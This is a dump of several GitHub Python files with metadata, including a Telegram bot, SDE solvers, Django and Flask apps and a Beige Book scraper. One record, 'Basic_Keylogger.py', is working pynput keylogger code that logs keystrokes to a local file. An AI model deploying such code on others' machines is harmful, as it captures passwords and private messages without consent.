"usage_type": "attribute"}, {"api_name": "tempfile.gettempdir", "line_number": 38, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 39, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 42, "usage_type": "call"}, {"api_name": "time.time", "line_number": 48, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "attribute"}, {"api_name": "tempfile.gettempdir", "line_number": 71, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path", "line_number": 74, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path", "line_number": 79, "usage_type": "attribute"}, {"api_name": "fs_tracker.get_artifact_cache", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path", "line_number": 88, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 88, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 89, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 91, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 93, "usage_type": "attribute"}, {"api_name": "subprocess.STDOUT", "line_number": 94, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 117, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 118, "usage_type": "attribute"}, {"api_name": "subprocess.STDOUT", "line_number": 119, "usage_type": "attribute"}, {"api_name": "util.sha256_checksum", "line_number": 127, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 133, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 135, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 158, "usage_type": "call"}, {"api_name": "os.path", "line_number": 158, "usage_type": "attribute"}, {"api_name": "fs_tracker.get_artifact_cache", "line_number": 162, "usage_type": "call"}, {"api_name": "fs_tracker.get_blob_cache", "line_number": 164, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 166, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 167, "usage_type": "call"}, {"api_name": "os.path", "line_number": 167, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 172, "usage_type": "call"}, {"api_name": "os.path", "line_number": 172, "usage_type": "attribute"}, {"api_name": "os.path.getmtime", "line_number": 176, "usage_type": "call"}, {"api_name": "os.path", "line_number": 176, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 188, "usage_type": "call"}, {"api_name": "os.path", "line_number": 188, "usage_type": "attribute"}, {"api_name": "tempfile.gettempdir", "line_number": 188, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 188, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 193, "usage_type": "call"}, {"api_name": "os.path", "line_number": 193, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 197, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 198, "usage_type": "attribute"}, {"api_name": "subprocess.PIPE", "line_number": 199, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 213, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 215, "usage_type": "attribute"}, {"api_name": "subprocess.STDOUT", "line_number": 216, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 225, "usage_type": "call"}, {"api_name": "os.path", "line_number": 225, "usage_type": "attribute"}, {"api_name": "os.rename", "line_number": 229, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 230, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 235, "usage_type": "call"}, {"api_name": "urllib.urlopen", "line_number": 257, "usage_type": "call"}, {"api_name": "tarfile.open", "line_number": 260, "usage_type": "call"}]} +{"seq_id": "40508829562", "text": "from platform import python_version\n\nfrom pyrogram.client import Client\nfrom pyrogram.filters import command\nfrom pyrogram.types import Message\n\nfrom .. import strings\n\n\n@Client.on_message(command(\"start\")) # pyright: ignore\nasync def start_cmd(_, message: Message) -> None:\n text = strings.start_message()\n await message.reply(text, quote=False)\n\n@Client.on_message(command(\"help\")) # pyright: ignore\nasync def help_cmd(_, message: Message) -> None:\n text = strings.help_message(python_version())\n await message.reply(text, quote=False)\n\n@Client.on_message(command(\"py\")) # pyright: ignore\nasync def py_cmd_noargs(_, message: Message) -> None:\n if len(message.command) > 1:\n message.continue_propagation()\n text = strings.py_message()\n await message.reply(text, quote=False)\n\n@Client.on_message(command(\"inline\")) # pyright: ignore\nasync def inline_cmd(app: Client, message: Message) -> None:\n me = await app.get_me()\n text = strings.inline_message(me.username)\n await message.reply(text, quote=False)\n", "repo_name": "vabgalimov/py3rbot", "sub_path": "py3rbot/plugins/a_text.py", "file_name": "a_text.py", "file_ext": "py", "file_size_in_byte": 1040, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pyrogram.types.Message", "line_number": 11, "usage_type": "name"}, {"api_name": "pyrogram.client.Client.on_message", "line_number": 10, "usage_type": "call"}, {"api_name": "pyrogram.client.Client", "line_number": 10, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 10, "usage_type": "call"}, {"api_name": "pyrogram.types.Message", "line_number": 16, "usage_type": "name"}, {"api_name": "platform.python_version", "line_number": 17, "usage_type": "call"}, {"api_name": "pyrogram.client.Client.on_message", "line_number": 15, "usage_type": "call"}, {"api_name": "pyrogram.client.Client", "line_number": 15, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 15, "usage_type": "call"}, {"api_name": "pyrogram.types.Message", "line_number": 21, "usage_type": "name"}, {"api_name": "pyrogram.client.Client.on_message", "line_number": 20, "usage_type": "call"}, {"api_name": "pyrogram.client.Client", "line_number": 20, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 20, "usage_type": "call"}, {"api_name": "pyrogram.client.Client", "line_number": 28, "usage_type": "name"}, {"api_name": "pyrogram.types.Message", "line_number": 28, "usage_type": "name"}, {"api_name": "pyrogram.client.Client.on_message", "line_number": 27, "usage_type": "call"}, {"api_name": "pyrogram.client.Client", "line_number": 27, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "27783359544", "text": "import pynput\r\nfrom pynput.keyboard import Key, Listener\r\n\r\nkeys = []\r\ncount = 0\r\n\r\n\r\ndef on_release(key):\r\n if key == Key.esc:\r\n return False\r\n\r\n\r\ndef on_press(key):\r\n print(\"{} key is pressed\".format(key))\r\n global keys, count\r\n keys.append(key)\r\n count += 1\r\n if count >= 10:\r\n count = 0\r\n writefile(keys)\r\n keys = []\r\n\r\n\r\ndef writefile(keys):\r\n with open(\"log.txt\", \"a\") as f:\r\n for key in keys:\r\n k=str(key).replace(\"'\",\"\")# replacing the single quotes\r\n if(k.find(\"space\")>0):\r\n f.write(\"\\n\") #If number of \"Key.space\" occurences are more than 1 then the following keystrokes will be in a new line\r\n elif(k.find(\"Key\")==-1):\r\n f.write(k) #If any other \"Key.\" is found ohter than the normal numbers and letters then they wont be recorded as keystrokes in \"log.txt\"\r\n \r\nwith Listener(on_press=on_press, on_release=on_release) as listener:\r\n listener.join()\r\n", "repo_name": "ArJuN-1712/Basic-Keylogger", "sub_path": "Basic_Keylogger.py", "file_name": "Basic_Keylogger.py", "file_ext": "py", "file_size_in_byte": 999, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pynput.keyboard.Key.esc", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pynput.keyboard.Key", "line_number": 9, "usage_type": "name"}, {"api_name": "pynput.keyboard.Listener", "line_number": 33, "usage_type": "call"}]} +{"seq_id": "12092864094", "text": "import numpy as np\nfrom Exercise1 import wiener_process\nfrom Exercise3 import riemann_stieltjes\nimport matplotlib.pyplot as plt\n\n\ndef euler_maruyama(x0, T, N):\n [t,W] = wiener_process(T, N)\n h = T/N\n X = [x0]\n for n in range(N):\n f = [i*0.5 for i in X]\n G = X\n new_X = X[n] + h*f[n] + G[n]*(W[n+1]-W[n])\n X += [new_X]\n expl = np.exp(W)\n return [t,X,expl]\n\n\ndef milstein(x0, T, N):\n [t,W] = wiener_process(T, N)\n h = T/N\n X = [x0]\n for n in range(N):\n f = [i*0.5 for i in X]\n G = X\n new_X = X[n] + h*f[n] + G[n]*(W[n+1]-W[n]) + 0.5*G[n]**2*((W[n+1]-W[n])**2 - h)\n X += [new_X]\n expl = np.exp(W)\n return [t, X, expl]\n\n\ndef bdf2_maruyama(x0, T, N):\n [t,W] = wiener_process(T, N)\n h = T/N\n X = [x0, x0 + (h/2)*x0 + x0*(W[1]-W[0])]\n for n in range(2, N):\n f = [i*0.5 for i in X]\n G = X\n X_part = (4/3)*X[n-1] - (1/3)*X[n-2]\n # f_part = (2*h/3)*f[n]\n G_part = G[n-1]*(W[n]-W[n-1]) - (1/3)*G[n-2]*(W[n-1]-W[n-2])\n new_X = (X_part + G_part)/(1-(h/3))\n X += [new_X]\n expl = np.exp(W)\n return [t, X, expl]\n\n\ndef square_diff(X,expl):\n # For mean square difference, it would be good to run this\n # a couple of times for different paths and then take the empirical unbiased mean.\n diff = []\n for i in range(len(X)):\n diff += [(X[i]-expl[i])**2]\n return diff\n\n\n[t,Xem,expl] = euler_maruyama(1,1,100)\nplt.plot(t,Xem)\nplt.plot(t,expl)\nplt.show()\n# plt.plot(t,square_diff(Xem,expl))\n# plt.show()\n\n[t,Xm,expl] = milstein(1,1,100)\nplt.plot(t,Xm)\nplt.plot(t,expl)\nplt.show()\n# plt.plot(t,square_diff(Xm,expl))\n# plt.show()\n\n[t,Xb,expl] = bdf2_maruyama(1,1,100)\nplt.plot(t[:-1], Xb)\nplt.plot(t[:-1], expl[:-1])\nplt.show()\n# plt.plot(t[:-1],square_diff(Xb,expl[:-1]))\n# plt.show()", "repo_name": "willet99/stochasticNumerics", "sub_path": "Exercise4.py", "file_name": "Exercise4.py", "file_ext": "py", "file_size_in_byte": 1839, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "Exercise1.wiener_process", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 16, "usage_type": "call"}, {"api_name": "Exercise1.wiener_process", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 29, "usage_type": "call"}, {"api_name": "Exercise1.wiener_process", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}]} +{"seq_id": "31228292078", "text": "\nfrom django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom .forms import UserRegisterForm, UserUpdateForm\nfrom django.contrib.auth.decorators import login_required\nfrom .models import CustomUser\nfrom .forms import FriendForm\n\ndef register(request):\n if request.method == 'POST':\n form = UserRegisterForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n messages.success(request, f'Your account has been created! You can now log in.')\n return redirect('login')\n else:\n form = UserRegisterForm()\n return render(request, 'users/register.html', {'form': form})\n\n@login_required\ndef profile(request, pk=None):\n if pk:\n user = CustomUser.objects.get(pk=pk)\n else:\n user = request.user\n args = {'user': user}\n return render(request, 'users/profile.html', args)\n\n@login_required\ndef update(request):\n if request.method == 'POST':\n form = UserUpdateForm(request.POST, instance=request.user)\n if form.is_valid():\n form.save()\n else:\n form = UserUpdateForm(instance = request.user)\n return render(request, 'users/update.html', {'form': form})\n\n\n\n@login_required\ndef testfindfriends(request):\n qLanguage = request.GET.get(\"language\")\n qAge = request.GET.get(\"age\")\n qUsername = request.GET.get(\"username\")\n users = CustomUser.objects.exclude(id = request.user.id)\n\n\n if (qLanguage == \"on\" or qAge== \"on\" or qUsername):\n if qLanguage == \"on\":\n users = users.filter(language_preference=request.user.language_preference)\n if qAge == \"on\":\n users = users.filter(age_range=request.user.age_range)\n if qUsername:\n users = users.filter(username = qUsername)\n args = {'users':users}\n return render(request, 'users/testfindfriends.html', args)\n else:\n\n args = {'users':users}\n return render(request, 'users/testfindfriends.html', args)", "repo_name": "LanguageExchange/Lex", "sub_path": "users/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2030, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "forms.UserRegisterForm", "line_number": 11, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 15, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 15, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 16, "usage_type": "call"}, {"api_name": "forms.UserRegisterForm", "line_number": 18, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 19, "usage_type": "call"}, {"api_name": "models.CustomUser.objects.get", "line_number": 24, "usage_type": "call"}, {"api_name": "models.CustomUser.objects", "line_number": 24, "usage_type": "attribute"}, {"api_name": "models.CustomUser", "line_number": 24, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 28, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 21, "usage_type": "name"}, {"api_name": "forms.UserUpdateForm", "line_number": 33, "usage_type": "call"}, {"api_name": "forms.UserUpdateForm", "line_number": 37, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 38, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 30, "usage_type": "name"}, {"api_name": "models.CustomUser.objects.exclude", "line_number": 47, "usage_type": "call"}, {"api_name": "models.CustomUser.objects", "line_number": 47, "usage_type": "attribute"}, {"api_name": "models.CustomUser", "line_number": 47, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 58, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 62, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 42, "usage_type": "name"}]} +{"seq_id": "70233744486", "text": "from flask import Flask, jsonify, abort\r\nfrom sqlalchemy import create_engine\r\nfrom sqlalchemy.orm import sessionmaker\r\n\r\nfrom models import *\r\n\r\n\r\ndb_file = 'store.db'\r\nengine = create_engine('sqlite:///{}'.format(db_file), convert_unicode=True)\r\nSession = sessionmaker(bind=engine)\r\nsession = Session()\r\n\r\napp = Flask(__name__)\r\n\r\n@app.teardown_appcontext\r\ndef shutdown_session(exception=None):\r\n '''Clean-up when the the app context is torn down'''\r\n session.close()\r\n\r\n@app.errorhandler(404)\r\ndef not_found(error):\r\n response = jsonify({'code': 404, 'message': 'Not found!'})\r\n response.status_code = 404\r\n return response\r\n\r\n@app.route('/api/stores', methods=['GET'])\r\ndef get_stores():\r\n '''Return all stores'''\r\n stores = session.query(Store).all()\r\n return jsonify([{'id': s.id, 'name': s.name} for s in stores])\r\n\r\n@app.route('/api/brands', methods=['GET'])\r\ndef get_brands():\r\n '''Return all brands'''\r\n brands = session.query(Brand).all()\r\n return jsonify([{'id': b.id, 'name': b.name} for b in brands])\r\n\r\n@app.route('/api/products/<int:brand_id>', methods=['GET'])\r\n@app.route('/api/products/<int:brand_id>/<int:offset>', methods=['GET'])\r\n@app.route('/api/products/<int:brand_id>/<int:offset>/<int:limit>', methods=['GET'])\r\ndef get_products_of_brand(brand_id, offset=0, limit=5):\r\n '''Return all products given a brand'''\r\n try:\r\n brand = session.query(Brand).filter(Brand.id == brand_id).first()\r\n except:\r\n abort(404)\r\n\r\n return jsonify([\r\n {'id': p.id, \r\n 'name': p.name, \r\n 'store': {\r\n 'id': p.stores.id,\r\n 'name': p.stores.name\r\n }\r\n } for p in brand.products[offset:limit]])\r\n\r\n@app.route('/api/product/<int:product_id>/<int:store_id>', methods=['GET'])\r\ndef get_product_details(product_id, store_id):\r\n '''Return product information given a product and brand'''\r\n try:\r\n product = session.query(Product).filter(Product.id == product_id).filter(Product.store_id == store_id).one()\r\n except:\r\n abort(404)\r\n\r\n return jsonify({\r\n 'id': product.id,\r\n 'name': product.name,\r\n 'type': product.type,\r\n 'price': float(product.price),\r\n 'position': product.page_position,\r\n 'page': product.page_number,\r\n 'category': {\r\n 'id': product.categories.id,\r\n 'name': product.categories.name,\r\n },\r\n 'brand': {\r\n 'id': product.brands.id,\r\n 'name': product.brands.name,\r\n }\r\n })\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)", "repo_name": "flipvrijn/scraped-data-to-structured-db", "sub_path": "server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 2592, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sqlalchemy.create_engine", "line_number": 9, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 10, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 13, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 22, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 30, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 36, "usage_type": "call"}, {"api_name": "flask.abort", "line_number": 46, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 48, "usage_type": "call"}, {"api_name": "flask.abort", "line_number": 63, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 65, "usage_type": "call"}]} +{"seq_id": "17123029416", "text": "# -*- coding: utf-8 -*-\r\n\r\nfrom __future__ import print_function\r\nfrom bs4 import BeautifulSoup\r\nfrom urllib.request import Request, urlopen\r\nfrom fake_useragent import UserAgent\r\nfrom datetime import datetime\r\nimport re\r\nimport pandas as pd\r\nimport pickle\r\nimport threading\r\nimport sys\r\nimport os\r\n\r\n\r\nclass BeigeBooks(object):\r\n \"\"\"\r\n This class firstly checks that the input arguments are of the correct type, followed\r\n by extracting the release month of each previous Beige Book. Subsequently, the Beige Book\r\n data is extracted, placing the results into a Pandas DataFrame.\r\n\r\n :param main_url: the Federal Reserve Open Monetary Policy (FOMC) website URL. (str)\r\n :param beige_book_url: the Beige Book directory page. (str)\r\n :param start_year: the year which the user wishes to begin parsing from. (int)\r\n :param historical_split: the year considered as historical (historical vs current archive list). (int)\r\n :param verbose: boolean determining printing during scraping. (bool)\r\n :param thread_num: the number of threads to use for web scraping. (int)\r\n :return: dataset: a DataFrame containing meeting minutes, indexed by meeting date. (pd.DataFrame)\r\n\r\n \"\"\"\r\n\r\n def __init__(self,\r\n main_url: str = 'https://www.federalreserve.gov',\r\n beige_book_url: str = 'https://www.federalreserve.gov/monetarypolicy/beige-book-default.htm',\r\n start_year: int = 1996,\r\n historical_split: int = 2019,\r\n verbose: bool = True,\r\n thread_num: int = 10\r\n ):\r\n\r\n if not all(isinstance(v, str) for v in [main_url, beige_book_url]):\r\n raise TypeError(\"The 'main_url' and 'beige_book_url' arguments must be string types.\")\r\n if not all(isinstance(v, int) for v in [start_year, historical_split, thread_num]):\r\n raise TypeError(\"The 'start_year', 'historical_split' and 'thread_num' arguments must be integer types.\")\r\n if not isinstance(verbose, bool):\r\n raise TypeError(\"The 'verbose' argument must be a boolean type.\")\r\n\r\n self.main_url = main_url\r\n self.beige_book_url = beige_book_url\r\n self.start_year = start_year\r\n self.HISTORICAL_SPLIT = historical_split\r\n self.verbose = verbose\r\n self.THREAD_NUM = thread_num\r\n self.dataset = None\r\n self.links = None\r\n self.dates = None\r\n self.articles = None\r\n\r\n def _obtain_links(self, start_year: int):\r\n \"\"\"\r\n The helper function constructs the links of all FOMC meetings,\r\n beginning at the start_year' argument, and continuing to the current\r\n date.\r\n\r\n :param start_year: the year at which the link construction begins. (int)\r\n \"\"\"\r\n if not isinstance(start_year, int):\r\n raise TypeError(\"The 'start_year' variable must be an integer type.\")\r\n\r\n if self.verbose:\r\n print(\"Constructing links between {} and {}\".format(start_year, datetime.today().year))\r\n\r\n self.links = []\r\n beige_book_socket = self._urlopen_with_ua(self.beige_book_url)\r\n soup = BeautifulSoup(beige_book_socket, 'html.parser')\r\n beige_books = soup.find_all('a', href=re.compile('^/monetarypolicy/beigebook\\\\d{6}.htm'))\r\n self.links = [beige_book.attrs['href'] for beige_book in beige_books]\r\n\r\n if start_year <= self.HISTORICAL_SPLIT:\r\n for year in range(start_year, self.HISTORICAL_SPLIT + 1):\r\n beige_book_annual_url = self.main_url + '/monetarypolicy/beigebook' + str(year) + '.htm'\r\n beige_book_annual_socket = self._urlopen_with_ua(beige_book_annual_url)\r\n bb_annual_soup = BeautifulSoup(beige_book_annual_socket, 'html.parser')\r\n historical_statements = bb_annual_soup.findAll('a', text='Statement')\r\n for historical_statement in historical_statements:\r\n self.links.append(historical_statement.attrs['href'])\r\n\r\n @staticmethod\r\n def _urlopen_with_ua(url: str) -> str:\r\n \"\"\"\r\n This helper function adds user agent credentials to the\r\n request, enabling the script to interact with the Federal\r\n Reserve website.\r\n\r\n :param url: the url to be queried, without a user agent. (str)\r\n :return: urlopen(req): the url opened using a user agent. (str)\r\n \"\"\"\r\n if not isinstance(url, str):\r\n raise TypeError(\"The 'url' argument must be a string type.\")\r\n\r\n ua = UserAgent()\r\n req = Request(url)\r\n req.add_header(\"user-agent\", ua.chrome)\r\n return urlopen(req)\r\n\r\n @staticmethod\r\n def _find_date_from_link(link: str) -> str:\r\n \"\"\"\r\n This helper function determines the FOMC meeting date from the relevant link.\r\n The function firstly checks that the link is a string type, followed by parsing\r\n the string to generate the date. The date string is subsequently returned.\r\n\r\n :param link: the link string to be parsed for dates. (str)\r\n :return: date: the date string parsed from the link string. (str)\r\n \"\"\"\r\n if not isinstance(link, str):\r\n raise TypeError(\"The 'link' argument must be a string type.\")\r\n\r\n date = re.findall('[0-9]{6}', link)[0]\r\n if date[4] == '0':\r\n date = \"{}/{}/{}\".format(date[:4], date[5:6], \"01\")\r\n else:\r\n date = \"{}/{}/{}\".format(date[:4], date[4:6], \"01\")\r\n return date\r\n\r\n def _add_article(self, link: str, index: int = None):\r\n \"\"\"\r\n This helper function adds the related minutes for 1 link to the instance variable.\r\n Multithreading stipulates that the articles must be stored in the correct order, where\r\n the 'index' argument is the index in the article to add to.\r\n\r\n :param link: the link to be opened and data generated for. (str)\r\n :param index: the index associated with the link. (int)\r\n \"\"\"\r\n if not isinstance(link, str):\r\n raise TypeError(\"The 'link' argument must be a string type.\")\r\n if not isinstance(index, (type(None), int)):\r\n raise TypeError(\"The 'index' argument must either be a None type or a integer type.\")\r\n\r\n if self.verbose:\r\n sys.stdout.write(\".\")\r\n sys.stdout.flush()\r\n\r\n self.dates.append(self._find_date_from_link(link))\r\n if len(link) <= 35:\r\n beige_book_output_socket = self._urlopen_with_ua(self.main_url + link)\r\n beige_book_output = BeautifulSoup(beige_book_output_socket, 'html.parser')\r\n paragraph_delimiter = beige_book_output.findAll('p')\r\n self.articles[index] = \"\\n\\n\".join([paragraph.get_text().strip() for paragraph in paragraph_delimiter])\r\n else:\r\n beige_book_output_socket = self._urlopen_with_ua(link)\r\n beige_book_output = BeautifulSoup(beige_book_output_socket, 'html.parser')\r\n paragraph_delimiter = beige_book_output.findAll('p')\r\n self.articles[index] = \"\\n\\n\".join([paragraph.get_text().strip() for paragraph in paragraph_delimiter])\r\n\r\n def _multithreaded_article_retrieval(self):\r\n \"\"\"\r\n This helper function returns all articles associated with each link. The function firstly\r\n initiates the threads, as specified by the 'thread_num' argument passed to the class. The\r\n function uses each thread to efficiently extract the articles and store the outcome.\r\n \"\"\"\r\n if self.verbose:\r\n print(\"Retrieving articles.\")\r\n\r\n self.dates, self.articles = [], [''] * len(self.links)\r\n jobs = []\r\n index = 0\r\n while index < len(self.links):\r\n if len(jobs) < self.THREAD_NUM:\r\n thread = threading.Thread(target=self._add_article, args=(self.links[index], index,))\r\n jobs.append(thread)\r\n thread.start()\r\n index += 1\r\n else:\r\n thread = jobs.pop(0)\r\n thread.join()\r\n\r\n for thread in jobs:\r\n thread.join()\r\n\r\n for row in range(len(self.articles)):\r\n self.articles[row] = self.articles[row].strip()\r\n\r\n def find_beige_books(self):\r\n \"\"\"\r\n This function acts as the main public function of the class, returning the Beige Books\r\n by efficiently extracting the information from the FOMC Website. The function then places each\r\n Beige Book into a Pandas DataFrame, indexed by the meeting date string.\r\n\r\n :return: dataset: a Pandas DataFrame containing the meeting minutes, indexed by meeting date. (pd.DataFrame)\r\n \"\"\"\r\n self._obtain_links(self.start_year)\r\n if self.verbose:\r\n print(\"Extracting the past {} Beige Books.\".format(len(self.links)))\r\n self._multithreaded_article_retrieval()\r\n\r\n self.dataset = pd.DataFrame(self.articles, index=pd.to_datetime(self.dates)).sort_index()\r\n self.dataset.columns = ['Beige_Book']\r\n\r\n if self.verbose:\r\n sys.stdout.write(\".\")\r\n sys.stdout.flush()\r\n\r\n for i in range(len(self.dataset)):\r\n self.dataset.iloc[i, 0] = self.dataset.iloc[i, 0].replace('\\n', ' ')\r\n self.dataset.iloc[i, 0] = self.dataset.iloc[i, 0].replace('\\r', ' ')\r\n self.dataset.iloc[i, 0] = self.dataset.iloc[i, 0].replace('\\t', '')\r\n self.dataset.iloc[i, 0] = self.dataset.iloc[i, 0].replace('\\xa0', '')\r\n\r\n return self.dataset\r\n\r\n def pickle_data(self, directory: str) -> bool:\r\n \"\"\"\r\n This public function acts as a main public function, for extraction and pickling of\r\n the extracted data to the 'directory' argument passed. The function checks that the\r\n directory argument is a string type, followed by checking if the directory ends with\r\n the appropriate extension. The folder is then created if necessary, followed by the\r\n data being written to the pickle file, where a boolean is returned to denote success / failure\r\n of the file write operation.\r\n\r\n :param directory: the directory to which the file should be written. (str)\r\n :return: bool: determines if the file was written correctly. (bool)\r\n \"\"\"\r\n if not isinstance(directory, str):\r\n raise TypeError(\"The 'directory' argument must be a string type.\")\r\n if not directory.endswith((\".pkl\", \".pickle\")):\r\n raise TypeError(\"The pickle file directory should end with a '.pkl' or '.pickle' extension.\")\r\n if not os.path.exists(os.path.split(directory)[0]):\r\n if self.verbose:\r\n print(\"Creating {} directory.\".format(os.path.split(directory)[0]))\r\n os.mkdir(os.path.split(directory)[0])\r\n output_dataset = self.find_beige_books()\r\n try:\r\n with open(directory, \"wb\") as pickle_output:\r\n pickle.dump(output_dataset, pickle_output)\r\n return True\r\n except(NotImplementedError, FileNotFoundError):\r\n return False\r\n\r\n\r\nif __name__ == '__main__':\r\n dataset = BeigeBooks().find_beige_books()\r\n \r\n", "repo_name": "David-Woroniuk/FedTools", "sub_path": "FedTools/Beigebook.py", "file_name": "Beigebook.py", "file_ext": "py", "file_size_in_byte": 11217, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 17, "dataset": "github-code", "pt": "52", "api": [{"api_name": "datetime.datetime.today", "line_number": 71, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 71, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 75, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 76, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 83, "usage_type": "call"}, {"api_name": "fake_useragent.UserAgent", "line_number": 101, "usage_type": "call"}, {"api_name": "urllib.request.Request", "line_number": 102, "usage_type": "call"}, {"api_name": "urllib.request.urlopen", "line_number": 104, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 119, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 141, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 141, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 142, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 142, "usage_type": "attribute"}, {"api_name": "bs4.BeautifulSoup", "line_number": 147, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 152, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 170, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 197, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 197, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 201, "usage_type": "call"}, 